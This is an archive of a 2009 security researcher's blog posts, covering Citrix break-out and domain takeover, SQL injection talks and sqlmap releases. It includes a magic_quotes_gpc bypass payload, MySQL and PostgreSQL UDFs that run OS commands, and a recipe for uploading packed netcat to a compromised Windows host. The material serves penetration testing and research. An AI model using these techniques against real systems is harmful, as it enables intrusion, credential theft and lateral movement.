Bernardo Damele A. G.

Abuse Citrix and own the domain

2009-11-11T18:04:00.062+01:00

Little Bobby Table is growing up quickly, he is now performing a Citrix break-out assessment: basically the scope of the penetration test consists in executing applications that he is not allowed to after logging to a Citrix MetaFrame or similar environment. Usually a screenshot with a command prompt showing the output of ipconfig /all is enough proof to the Client that you have successfully broken out of the restricted environment and the party can roll out onwards. There are many tutorials to achieve this goal and I will not repeat them.

Assume that little Bobby asked for help to old uncle Google, found the above mentioned tutorials along with some videos and successfully broke-out of the environment while circumventing Windows GPO/SRP and other security mechanism getting a command prompt or even an unrestricted RDP session onto the box.
He now feels good, is excited and wants the Client to know that in about half an hour he broke-out of the environment, then he calls who paid two or more days of assessment to let him know that he is done already with the work and asks for permission to go further with the test and demonstrate how dangerous a malicious attacker could be in such a scenario. The Client agrees.. in the end he paid for the rest of man days, wants to make profit out of them and is keen to know about flaws within his whole network.

What is next?

Little Bobby knows about the beauties of Windows' net command and uses it to enumerate machines within the Windows domain, identify the primary domain controller (PDC), list local and domain users from the PDC/BDC, etc.. all in all gather as much information as possible about the owned system and its network perimeter.

He can also upload his own tools by mapping his local shared hard-drive via Citrix XenApp (the new Citrix ICA client for Windows) onto the target Citrix environment, by copy 'n paste and debug.exe trick, via muudecode/uuencode, or whatever working technique, depending how hardened Citrix is.

First goal now is to escalate privileges to a highly privileged local user like Administrator or LOCAL SYSTEM assuming that the user is not within the Administrators group already. There exist several techniques to do so. Once done it is game over, you own that system completely.

What about logging onto other systems?

Surely little Bobby won't stop here. He wants to own all the servers within the network perimeter, above all the PDC and other infrastructure critical servers, like database servers.

He dumps user's password hashes (Security Accounts Manager), LSA secrets, passwords cache, protected storage, reversible encryption storage, passwords history and current logon sessions tokens. PWDumpX and Cain&Abel are handy tools along with the others linked.
Now he has collected credentials of many other users: either plain-text or NTLM credentials for all local users, users who logged onto the box since last reboot, users logged in at the very same time, and users used to start services.
Hopefully among these credentials, little Bobby has got the hash of a domain user. If he gets very lucky, it will be a domain administrator. Again, net is your friend to check so.

Now Bobby resurrect the list of enumerated hosts, tries to discover more hosts on the network perimeter via ping sweep, ARP scan and network traffic sniffing with a bunch of uploaded tools. He now has a huge list of hosts to own. On top of the list there are the domain controllers and eventually the database servers!

At this point he has a list of hosts in one text file and a single file collecting the above dumped hashes (output of PWDumpX et all).

Own the LAN: the common way

Little Bobby could crack the dumped password hashes and try to login over SMB or RDP with the cracked plain-text credentials onto the other systems, one by one. To login and execute commands over SMB onto another system he could upload to the Citrix box and run a single executable file, PsExec.

Another tool can be handy, smbshell, a pre-compiled NASL script, but it requires the nasl interpreter and a bunch of other Nessus libraries to run, not very convenient in the above scenario. Nevertheless, an advantage over PsExec is that it accepts also the NTLM hash of the password, so there is no need to crack the password to login over SMB. Like PsExec, it can be used to login onto one system at a time.

Isn't there anything quicker to check usefulness of dumped hashes?

Own the LAN: the quickest way

Our lazy little Bobby heard about a new open source multi-threaded tool called keimpx developed in Python that can be used to quickly check for the usefulness of credentials across a network over SMB. Credentials can be:

Combination of user / plain-text password.
Combination of user / NTLM hash.
Combination of user / NTLM logon session token.

If any valid credentials has been identified across the network after its attack phase, the user is asked to choose which host to connect to and which valid credentials to use, then Bobby will be prompted with an interactive SMB shell where he can:

Navigate through the available shares: list, upload, download files, create, remove files, etc.
Deploy and undeploy his own service (for instance, a backdoor listening on a TCP port for incoming connections).
List users' details and domains.
Read/write/delete registry keys (soon).
Spawn an interactive command prompt like PsExec can do (soon).

This tool does the trick and is the quickest way to identify in a single shot which dumped hashes work on which machines of the network perimeter without the need to crack the hashes. Moreover, it can also be used to login over SMB onto the systems where valid credentials have been spotted and perform the above mentioned operations.

keimpx is a work in progress tool and feedback is more than welcome!

Remember that:

Many users share the same password across multiple machines, this might include also Administrator, in such a case you are local administrator on most, if not all, the systems of the network perimeter.
You might have been lucky enough to dump also a domain administrator password hash (for instance, via LSA secrets dump, Pass-the-Hash's whosthere.exe or incognito) so you totally own the domain and can login on all systems of the network with the highest global privileged user.

Little Bobby Table can now call the Client and let him know that he has access to most (if not all) the network's machines.

Own the LAN: the hardcore way

If no dumped credentials worked on any other system then Bobby needs to get his hands dirty.

If the Citrix environment has direct access to the Internet he could initiate an out-of-band connection with his own local system to pivot traffic from the local system to the Citrix machine network perimiter. This can be achieved, for instance, via Metasploit's Meterpreter. From this point on he can launch any Metasploit module against others boxes to portscan them, perform a vulnerability assessment or exploit security flaws.
Elsewhere, if the Citrix environment has not direct access to the Internet, Bobby can upload a port scanner and his suite of exploits to scan and own them all.

CONFidence 2009 2.0

2009-11-10T03:37:00.004+01:00

My friend Guido Landi and I have been selected as speakers for CONFidence 2009 2.0 conference. We are scheduled to present on November 20.

We will be presenting a slightly updated version of our presentation titled Expanding the Control Over Operating System From the Database. The new abstract is as follows:

Using a database (MySQL, PostgreSQL and Microsoft SQL Server), either via a SQL injection or via direct connection, as a stepping stone to control the underlying operating system can be achieved. There is much to say on operating system control by owning a database server: Windows registry access, anti-forensics technique to establish an out-of-band stealth connection, buffer overflow exploitation with memory protections bypass and custom user-defined function injection. These topics and more will be highlighted during the presentation.

The Conference will take place on November 19 - 20, 2009 at Femina Cinema in Warsaw (Poland), don't miss it if you can!

Expanding the control over the operating system from the database

2009-09-26T00:21:00.008+02:00

On Tuesday I came back from Barcelona (Spain) where I gave a talk with my friend Guido Landi at SOURCE Conference 2009 , met some very smart people, had good chats, fun times too and ate amazing spanish tapas with tasty local red wine!

Thanks SOURCE Barcelona 2009 team for organizing such a great event and giving me the opportunity to come over!

Our presentation slides are online on Slideshare. You can also read them below.

I also released sqlmap 0.8 release candidate 1 with all of the new features described during my presentation at the Conference. You can also checkout the source code from the sqlmap Subversion repository.

$ svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap/ sqlmap

SOURCE Barcelona 2009

2009-09-07T10:42:00.003+02:00

My friend Guido Landi and I have been selected as speakers for SOURCE Barcelona 2009 conference. We are scheduled to present on September 21.

Our presentation is titled Expanding the Control Over Operating System From the Database and the abstract is as follows:

Using a database, either via a SQL injection or via direct connection, as a stepping stone to control the underlying operating system can be achieved. There is much to say on operating system control by owning a database server: Windows registry access, anti-forensics techniques and custom user-defined function injection. These topics and more will be highlighted during the presentation.

The Conference will take place on September 21 - 22, 2009 at Museu Nacional D’art de Catalunya in Barcelona (Spain), don't miss it if you can!

sqlmap 0.7 released

2009-07-25T23:32:00.000+02:00

Today I released sqlmap version 0.7.

Along all the takeover features introduced in sqlmap 0.7 release candidate 1, some of the new features include:

Adapted Metasploit wrapping functions to work with latest 3.3 development version too.
Adjusted code to make sqlmap 0.7 to work again on Mac OSX too.
Reset takeover OOB features (if any of --os-pwn, --os-smbrelay or --os-bof is selected) when running under Windows because msfconsole and msfcli are not supported on the native Windows Ruby interpreter. This make sqlmap 0.7 to work again on Windows too.
Minor improvement so that sqlmap tests also all parameters with no value (eg. par=).
HTTPS requests over HTTP proxy now work on either Python 2.4, 2.5 and 2.6+.

Complete list of changes at http://sqlmap.sourceforge.net/doc/ChangeLog.

If you have any feedback feel free to contribute!

Back from Lisbon, Portugal

2009-06-30T15:55:00.005+02:00

Last week-end I was in Lisbon (Portugal) speaking at the 2nd Digital Security Forum.
The Conference was a blast! Very well organized, good location, warm people and some interesting speeches too. I look forward to attend at the next.

Thanks to the guys at PontoSI and other sponsors for organizing such a great event.

As usual, I published the slides on SlideShare.

Digital Security Forum 2009

2009-06-10T16:19:00.006+02:00

I have been invited to speak at the 2nd Digital Security Forum in a couple of weeks time.

I will present an updated version of my slides SQL injection: Not Only AND 1=1. The abstract is once again as follows:

The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I will then illustrate into details common and uncommon problems and respective solutions with examples that a penetration tester faces when he wants to take advantage of any kind of web application SQL injection flaw on real world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single entry UNION query SQL injection, specific web application technologies IDS bypasses and more.

The Conference will take place on June 26 - 27, 2009 at Hotel Olissippo Oriente in Lisbon (Portugal).
If you are around, it's an occasion to catch up and share ideas on application security, see you there!

sqlmap in Ubuntu package repository

2009-06-02T15:15:00.003+02:00

Ubuntu developer James Westby has been very fast to pick sqlmap up from Debian repository, it is now officially available as a package "for human beings" on Ubuntu Karmic, the next stable release!

PaulDotCom video on sqlmap

2009-05-27T12:37:00.010+02:00

During PaulDotCom Security Weekly - Episode 152 on May 14, 2009, John Strand discussed about sqlmap in a video hosted on vimeo.

I think the video is worth watching for someone interested in having a quick overview on very few sqlmap features, but going through the users' manual and the users' mailing list archive offer much more technical insight on the tool and the vulnerability itself.

Follows my comments on the video:

Minute 0:20 - "[...] one of the reasons why I think it is better than commercial tools it's quite simply because of its flexibility [...]".

In practice only the less flexible enumeration option has been demonstrated (--dump-all) rather than focusing on the fact that it has plenty of options to automatically enumerate/dump specific information like for example test if session user is DBA, retrieve only current user password hash, dump only a range of entries from a table or even only some columns, etc. All of these features are illustrated with examples in the sqlmap user's manual.
Also, he is showing sqlmap user's manual from the site (0.7rc1) but during the demonstration he is using sqlmap 0.6.4.

Minute 7:10 - "[...] there has been a lot of tools that do PHP [...]. This tool also has the capability of doing ASP [...]".

SQL injection is not a matter of the web application language. It is a matter of lack of security driven development best practices put in place, lack of proper input sanitization, lack of proper web application firewall and so on. The concept exposed by John here is wrong and can lead the newbie user to not understand the flaw properly.
Also, from his words it seems that a SQL injection tool is more powerful if it "does" more web scripting languages: needless to say that this is totally wrong because as soon as the tool engine is written and working, the SQL injection tool does not care at all what is the language in which the application is written. On the other hand, something that shall be considered when evaluating a SQL injection tool is its support for different back-end DBMS software which implies support for different SQL dialects because the SQL statements depend upon the database software / version / session user privileges. Again, not on the front-end language.

Minute 7:26 - "[...] a wonderful error [...] tools crash anytime [...]".

If you take a look at the Python traceback, you see why the tool raises the exception. It's because sqlmap saves everything it fetches into the output/ subfolder. John probably run the tool at first place as a privileged user so the output/testasp.acunetix.com/log has been created with 644 privileges, owned by root and since he runs the tool for the second time as normal user (apparently argotek) it's obvious that it "crashes" with a Permission denied exception.

Minute 7:39 - "[...] going off Microsoft SQL back-ends as well as part of ASP".

Good point, but Microsoft SQL Server can be the back-end DBMS also for a front-end application in PHP or any other language that has built-in or external connectors to support connections to such DBMS.

Minute 7:50 - --sql-shell has been recently fixed. Give it a try to the latest development version from subversion repository. However, good point and well described here.

Minute 8:35 - Thanks for pointing out the user several times to RTFM.

John only mentioned about the takeover functionality at the beginning of the video while going through the user's manual pages.
What about a video demonstrating in practice the new features to takeover the underlying file system and operating system from the SQL injection vulnerability? To give you an idea, just grab sqlmap from subversion repository and read more on my presentations' slides, whitepaper and video.

EUSecWest 2009

2009-05-25T11:39:00.004+02:00

I have been selected as a speaker for EUSecWest 2009 ! I am scheduled to talk on May 28.

I will be presenting a cut down version of my Black Hat Europe talk due to the shorter time available. However, the most interesting aspects of the research will be covered along with the practical demonstrations with the latest sqlmap development version.

The Conference will take place on May 27 - 28, 2009 at the Sound Club in central London (United Kingdom) and the schedule looks very promising, don't miss it if you can!

Back from OWASP AppSec Europe 2009

2009-05-20T16:31:00.006+02:00

Last Wednesday I was in Kraków (Poland) at OWASP AppSec Europe 2009 Conference where I gave a talk, met again some OWASP Italy mates and a few new people too, had good chats and fun times too.

Thanks OWASP Board for organizing the event and giving me the opportunity to come over!

Giorgio Fedon took some pictures during my speech, you can have a look at them on his Facebook photo album. I also mirrored them here.

My presentation slides are available on Slideshare here and on OWASP site here along with all other presentations. The video should also be soon available on the OWASP channel on Blip.TV.

Presentations videos

2009-05-11T16:15:00.006+02:00

The video of my recent presentations are available online as MPEG 4 encoded files:

Black Hat Europe 2009
Front Range OWASP Conference 2009 (also available on Google Video)

Comments are welcome!

sqlmap in Debian package repository

2009-05-08T11:56:00.007+02:00

sqlmap version 0.6.4 Debian package has been officially accepted in Debian repository!

As for every new Debian package, I firstly packaged it, opened an ITP wishlist bug on Debian bug tracking system, uploaded it to Debian mentors repository, found a Debian developer to sponsor it and upload it on the Debian queue of new packages and finally the package has been accepted by one of the Debian FTP masters in the Unstable tree. In a few weeks it should pass to the Testing tree and hopefully for next official Debian release to the Stable tree too.

Thanks Pierre Chifflier for sponsoring it and Mark Hymers for accepting it.

As soon as I will release sqlmap new stable version 0.7 I will package it and provide it with the Debian sponsor to upload it straightaway.
In the meanwhile if you are running Debian unstable (codename: sid) you can enjoy sqlmap by running:

apt-get update
apt-cache show sqlmap
apt-get install sqlmap
sqlmap -h

Relevant links on Debian site:

sqlmap package main page on Debian
Overview of sqlmap source package on Debian
Debian Bug report logs: Bugs in package sqlmap
sqlmap Debian package changelog
Debian patch tracking system: sqlmap

UPDATE - May 18, 2009: sqlmap has been migrated also to Debian testing (squeeze).

OWASP AppSec Europe 2009

2009-05-01T11:08:00.002+02:00

I have been selected as a speaker for OWASP AppSec Europe 2009! I am scheduled to talk on May 13 afternoon.

I will be presenting a cut down version of my Black Hat Europe talk due to the shorter time available. However, the most interesting aspects of the research will be covered along with the practical demonstrations.

The Conference will take place on May 13 - 14, 2009 at Park Inn Hotel in Kraków (Poland), don't miss it if you can!

Advanced SQL injection to operating system full control

2009-04-20T16:53:00.010+02:00

On Saturday I came back from Amsterdam (The Netherlands) where I gave a talk at Black Hat Briefings Europe 2009, met some very smart people, had good chats and fun times too.

Thanks Black Hat team for organizing such a great event and giving me the opportunity to come over!

My presentation whitepaper is online on sqlmap site and the slides are online on Slideshare. You can also read them below.

I also released sqlmap 0.7 release candidate 1 with all of the new features described during my presentation at the Conference. You can get a copy from the tool homepage.

UPDATE - April 25, 2009: The presentation material is also available on Black Hat Europe 2009 archive page.

Black Hat Europe 2009

2009-03-23T11:59:00.010+01:00

I have been selected as a speaker for Black Hat Europe 2009 Briefings! I am scheduled to talk on April 16.

My presentation is titled Advanced SQL Injection exploitation to operating system full control and the abstract is as follows:

Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.

It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference.

At the moment I am rushing on writing the last pages of the white paper: the deadline is in a few days.
The research phase is finished with the expected results and the development is at a good point.

The Conference will take place on April 14 - 17, 2009 at Moevenpick Hotel City Centre in Amsterdam (The Netherlands), don't miss it if you can!

UPDATE - April 2009: Pre-conference media coverage:

Black Hat Europe Researcher Hacks Database Servers - DarkReading. April 1, 2009
Security Researcher to Unveil Database Server Hack at Black Hat Europe - eWeek. April 2, 2009
Next-gen SQL injection opens server door - The Register. April 2, 2009
SQL injection attack leads to command execution - Infosecurity US. April 3, 2009
Security Expert To Demo SQL Injection At Black Hat - eWeek Europe. April 3, 2009

Post-conference media coverage:

SQL injection reloaded: access to the operating system - H-online. April 17, 2009
SQL-Injection reloaded: Zugriff auf das Betriebssystem - Heise. April 17, 2009 (german)
Einfallstor SQL-Server - Microsoft. April 22, 2009 (german)

OWASP London - March 2009 meeting

2009-03-18T19:31:00.005+01:00

Last week I presented at the OWASP London chapter meeting the material that I presented in Denver early this month.

I had to rush in the end for lack of time and the fact that the room was booked until 8:30 PM, so for the ones that followed the presentation, but missed a deep explanation, do not worry, the slides are still online and the video registration from Denver conference will be available on the OWASP site shortly.

Apart from the short time to present, I came to meet some more IT folks afterwards at pub. See you next time!

UPDATE - March 24, 2009: The video is online on Google Video.

SQL injection: Not only AND 1=1

2009-03-10T17:04:00.008+01:00

On Sunday I came back from Denver (USA) where I gave a talk at Front Range OWASP Conference, met some very smart people, had good chats and fun times too.

Thanks OWASP Denver chapter for organizing such a great event and giving me the opportunity to come over!

My presentation slides are online on Slideshare and you can also read them below.

If you're around London area on Thursday night (March 12, 2009) come over to the upcoming OWASP London meeting: I've been invited by the chapter leader to present this material again.

Front Range OWASP Conference 2009

2009-02-23T13:00:00.011+01:00

I am flying to Denver in Colorado (USA) in a couple of weeks to give a talk at the upcoming Front Range OWASP Conference 2009 on March 5, 2009 and meet other people in the IT security industry.

The title of the talk is SQL injection: Not only AND 1=1 and its abstract is:

The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I will then illustrate into details common and uncommon problems and respective solutions with examples that a penetration tester faces when he wants to take advantage of any kind of web application SQL injection flaw on real world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single entry UNION query SQL injection, blind SQL injection algorithm speed enhancements, specific web application technologies IDS bypasses and more.

If you are around, it's an occasion to catch up and share ideas on application security, see you there!

UPDATE - March 24, 2009: The video is online on Google Video.

sqlmap 0.6.4 released

2009-02-04T18:17:00.003+01:00

Today I released sqlmap version 0.6.4.

Some of the new features and major bugs fixed:

Major enhancement to make the comparison algorithm work properly also on url not stables automatically by using the difflib Sequence Matcher object.

Major enhancement to support SQL data definition statements, SQL data manipulation statements, etc from user in SQL query and SQL shell if stacked queries are supported by the web application technology.

Major speed increase in DBMS basic fingerprint.

Major bug fix to correctly handle custom SQL "limited" queries on Microsoft SQL Server and Oracle.

Major bug fix to avoid tracebacks when multiple targets are specified and one of them is not reachable.

Complete list of changes at http://sqlmap.sourceforge.net/doc/ChangeLog.

Want to contribute? Have a look here.

More on PHP magic_quotes_gpc misuse and bypass

2009-01-23T21:33:00.001+01:00

Some weeks ago I posted about a possible way to bypass PHP magic_quotes_gpc setting when the back-end database management system is Oracle.

The concept behind the bypass is that in Oracle's SQL dialect the character to escape a single-quote is a single-quote and the same is in Microsoft SQL Server.

A query like the following is syntatically wrong:

SELECT name FROM users WHERE name LIKE '%foo'bar%'

But a query like this is syntatically correct:

SELECT name FROM users WHERE name LIKE '%foo''bar%'

For instance let's assume that such a query is used by a web application and the malicious user has access to manipulate the LIKE clause field and the back-end DBMS is either Oracle or Microsoft SQL Server, then magic_quotes_gpc can be bypassed by injecting a UNION query SQL injection statement (or a blind SQL injection statement) similar to the following:

foobar' UNION ALL SELECT name FROM master..syslogins--

Which will be processed by PHP and passed to the back-end DBMS as:

SELECT name FROM users WHERE name LIKE '%foobar\' UNION ALL SELECT name FROM master..syslogins--%'

The statement is syntatically correct and it is processed as expected because the backslash character added by PHP is not the back-end DBMS specific escaping character.

It's probably not as common as it is for Oracle to find a PHP web application with Microsoft SQL Server as back-end database management system but still it's worth knowing that this web application security setting bypass works on both database management systems.
Refer to the previous Oracle post for further details and personal considerations.

Command execution with a PostgreSQL UDF

2009-01-22T23:08:00.002+01:00

As I stated on a previous post, modern database management systems allow to interact with the underlying operating system giving to the database administrator or to a malicious user, potentially a remote attacker through a SQL injection vulnerability, the possibility to:

Execute operating system command
Read and write files on the file system

On PostgreSQL it is possible to create a User-Defined Function to execute commands on the underlying operating system. This can be done in three ways:

Taking advantage of libc built-in system() function:
Nico Leidecker implemented this technique in his pgshell tool and it is described in the OWASP Backend Security Project guide.

By creating a proper Procedural Language Function in PL/Tcl, PL/Perl or PL/Python:
Daniele Bellucci described the steps to go through to do that by using PL/Perl and PL/Python.

By creating a C-Language Funcion:
David Litchfield described this technique in his book The Database Hacker's Handbook, chapter 25 titled PostgreSQL: Discovery and Attack (source code freely available from Wiley book page).

All of these methods have at least one limitation that make them useless on recent PostgreSQL server installations:

The first method only works until PostgreSQL version 8.1 and returns the command exit status, not the command standard output. Since PostgreSQL version 8.2-devel all UDF must include a magic block after having included the header fmgr.h as explained here.
Recompiling libc to include a PostgreSQL specific magic block is not a good idea.

The second method only works if PostgreSQL server has been compiled with support for one of those Procedural Language Function. By default they are not available, at least on most of Linux distributions.

The third method works until PostgreSQL version 8.1 for the same reason of the first method and it has the same behavior (no command standard output). Anyway, it can be patched to include the magic block and make it work properly also on PostgreSQL versions above 8.1.

I adapted the MySQL UDF for command execution to PostgreSQL and created a C-Language Funcion called lib_postgresqludf_sys: for the moment it works on any PostgreSQL server version on Linux systems.
It implements two functions:

sys_eval - executes an arbitrary command, and returns its output.
sys_exec - executes an arbitrary command, and returns its exit code.

The source code can be found on sqlmap subversion repository here and a package with the source code is available here.

Usage example:

$ wget --no-check-certificate https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/postgresqludfsys/lib_postgresqludf_sys_0.0.1.tar.gz
$ tar xfz lib_postgresqludf_sys_0.0.1.tar.gz
$ cd lib_postgresqludf_sys
$ sudo ./install.sh
Compiling the PostgreSQL UDF
gcc -Wall -I/usr/include/postgresql/8.3/server -I. -shared lib_postgresqludf_sys.c -o /usr/lib/lib_postgresqludf_sys.so
PostgreSQL UDF compiled successfully

Please provide your PostgreSQL 'postgres' user's password
Password for user postgres:
PostgreSQL UDF installed successfully
$ psql -h 127.0.0.1 -p 5432 -U postgres -q template1
Password for user postgres:
template1=# SELECT sys_eval('pwd');
sys_eval
------------------------------
/var/lib/postgresql/8.3/main

(1 row)

template1=# SELECT sys_exec('touch /tmp/test_postgresql');
sys_exec
----------
0
(1 row)

template1=# \q
$ ls -l /tmp/test_postgresql
-rw------- 1 postgres postgres 0 2009-01-22 20:07 /tmp/test_postgresql

The main advantage over MySQL is that, at the time of writing this post, Ubuntu (probably other distributions too) has no AppArmor profile file in its default PostgreSQL server package so UDF that call C functions like system() or popen() are not denied.

Another notable difference is that common web applications' dynamic languages allow stacked queries (multiple statements) when the back-end database management system is PostgreSQL which make it easier for an attacker to take advantage of a SQL injection to execute arbitrary operating system commands.

UPDATE on January 25, 2009: PacketStormSecurity.org and milw0rm.com mirrored it here and here.

MySQL UDF and AppArmor

2009-01-19T23:21:00.000+01:00

From Wikipedia:

AppArmor allows the system administrator to associate with each program a security profile which restricts the capabilities of that program. It supplements the traditional Unix discretionary access control (DAC) model by providing mandatory access control (MAC).

By default AppArmor is running out-of-box on Ubuntu, openSUSE, Mandriva and a few other Linux distributions.
Ubuntu offers it as a package since Feisty release, and runs it by default since Gutsy release.

Since Ubuntu Hardy the MySQL 5.0 server package contains also an AppArmor profile file (/etc/apparmor.d/usr.sbin.mysqld) which limits MySQL server functionalities, like calling an UDF to execute commands.
The file is owned by root and has 644 permissions by default so only having root privileges on the box it is possible to write (i.e. with INTO OUTFILE clause in a SQL SELECT statement) on it in order to add a rule that allows command executions from an UDF.

Example:

$ sudo apparmor_status
[...]
1 processes have profiles defined.
0 processes are in enforce mode :
0 processes are in complain mode.
1 processes are unconfined but have a profile defined.
/usr/sbin/mysqld (5128)

$ mysql -u root -p mysql Enter password:
[...]
mysql> SELECT sys_eval('id');
+----------------+
| sys_eval('id') |
+----------------+
||
+----------------+
1 row in set (0.12 sec)

mysql> select sys_exec('id');
+----------------+
| sys_exec('id') |
+----------------+
| 32512 |
+----------------+
1 row in set (0.01 sec)

mysql> exit
Bye

$ sudo /etc/init.d/apparmor stop
Unloading AppArmor profiles : done.

$ sudo apparmor_status
[...]
0 processes have profiles defined.
0 processes are in enforce mode :
0 processes are in complain mode.
0 processes are unconfined but have a profile defined.

$ mysql -u root -p mysql
Enter password:
[...]
mysql> select sys_eval('id');
+--------------------------------------------------+
| sys_eval('id') |
+--------------------------------------------------+
| uid=118(mysql) gid=128(mysql) groups=128(mysql) |
+--------------------------------------------------+
1 row in set (0.02 sec)

mysql> select sys_exec('id');
+----------------+
| sys_exec('id') |
+----------------+
| 0 |
+----------------+
1 row in set (0.10 sec)

I am brainstorming with a friend on how to bypass AppArmor and we have come out with a couple of ideas so far.. And you? Feel free to get in touch with me in case you've any idea or technique to do that.

Command execution with a MySQL UDF

2009-01-16T23:47:00.012+01:00

Modern database management systems are powerful applications: they provide several instruments to interact with the underlying operating system.

On MySQL it is possible to create a User-Defined Function to execute commands on the underlying operating system. Marco Ivaldi demonstrated that some years ago. His raptor_udf2.c works well, but it has two limitations:

It is not MySQL 5.0+ compliant because it does not follow the new guidelines to create a proper UDF.
It calls C function system() to execute the command and returns always integer 0.

These limitations make the UDF almost useless on recent MySQL server installations if the database administrator wants to get the exit status of the command as UDF output or the command standard output itself.

I recently came across an open repository of MySQL User-Defined Functions maintained by Roland Bouman and other developers. One of their codes kept my attention: lib_mysqludf_sys (version 0.0.2) which implements three different functions to interact with the underlying environement:

sys_exec: executes an arbitrary command, and can thus be used to launch an external application.
sys_get: gets the value of an environment variable.
sys_set: create an environment variable, or update the value of an existing environment variable.

The first function can be used to execute operating system commands and has two advantages over raptor's UDF:

It is MySQL 5.0+ compliant and it compiles on both Linux as a shared object and on Windows as a dynamic-link library.
It returns the exit status of the executed command.

However, none of these two functions return the command standard output so I took some time to patch this last source code adding a sys_eval() UDF to return the standard output of the command if it success, NULL otherwise.

The patched source code can be found on sqlmap subversion repository here and a single patch file for the original lib_mysqludf_sys version 0.0.2 is available here.

Usage example:

$ wget --no-check-certificate https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/mysqludfsys/lib_mysqludf_sys_0.0.3.tar.gz
$ tar xfz lib_mysqludf_sys_0.0.3.tar.gz
$ cd lib_mysqludf_sys_0.0.3
$ sudo ./install.sh
Compiling the MySQL UDF
gcc -Wall -I/usr/include/mysql -I. -shared lib_mysqludf_sys.c -o /usr/lib/lib_mysqludf_sys.so
MySQL UDF compiled successfully

Please provide your MySQL root password
Enter password:
MySQL UDF installed successfully
$ mysql -u root -p mysql
Enter password:
[...]
mysql> SELECT sys_eval('id');
+--------------------------------------------------+
| sys_eval('id') |
+--------------------------------------------------+
| uid=118(mysql) gid=128(mysql) groups=128(mysql) |
+--------------------------------------------------+
1 row in set (0.02 sec)

mysql> SELECT sys_exec('touch /tmp/test_mysql');
+-----------------------------------+
| sys_exec('touch /tmp/test_mysql') |
+-----------------------------------+
| 0 |
+-----------------------------------+
1 row in set (0.02 sec)

mysql> exit
Bye
$ ls -l /tmp/test_mysql
-rw-rw---- 1 mysql mysql 0 2009-01-16 23:18 /tmp/test_mysql

UPDATE on January 25, 2009: Roland Bouman uploaded to the MySQL User-Defined Functions repository my patched version of lib_mysqludf_sys. He also updated its manual page. You can now get version 0.0.3 also from his repository.
PacketStormSecurity.org and milw0rm.com mirrored it here and here.

Debug scripts from binaries

2009-01-12T23:51:00.012+01:00

I could not find a MS-DOS executable binary file to ASCII debug script converter in Python then I wrote it. It's based on ToolCrypt dbgtool.exe algorithm.

You can find the tool on sqlmap SVN repository here with its manual.

The script can be useful for instance when you've exploited a SQL injection flaw that allows you to write a text file on the back-end DBMS file system: you can upload the debug text script then execute the Windows native debug.exe on it to recreate the portable executable, rename it to end with .exe or .com and execute it.
A very good example of this technique is implemented in sqlninja by icesurfer: it uses Microsoft SQL Server built-in xp_cmdshell to write line by line the debug text script into the temporary folder on the back-end DBMS server file system, recreates the binary and remanes it.

Going further you can also use a packer like UPX to compress up to 50% the original portable executable before running dbgtool.py on it. This does not change anything in the behaviour of the recreated binary file, it can just save a lot of time during the debug script upload as well as space on the file system.

Example with netcat:

Download and unpack netcat for Windows
Install UPX (on Debian like systems run: sudo apt-get install upx-nrv)
Execute in the netcat folder this command: upx-nrv -9 nc.exe -o nc_upx.exe
SVN checkout/update sqlmap Subversion repository
Execute from REPOSITORY_PATH/extra/dbgtool/ folder this command: python ./dbgtool.py -i NETCAT_PATH/nc_upx.exe -o NETCAT_PATH/nc_upx.scr
Upload nc_upx.scr to the exploited Windows system and follow dbgtool.py manual to create the portable executable on it and execute it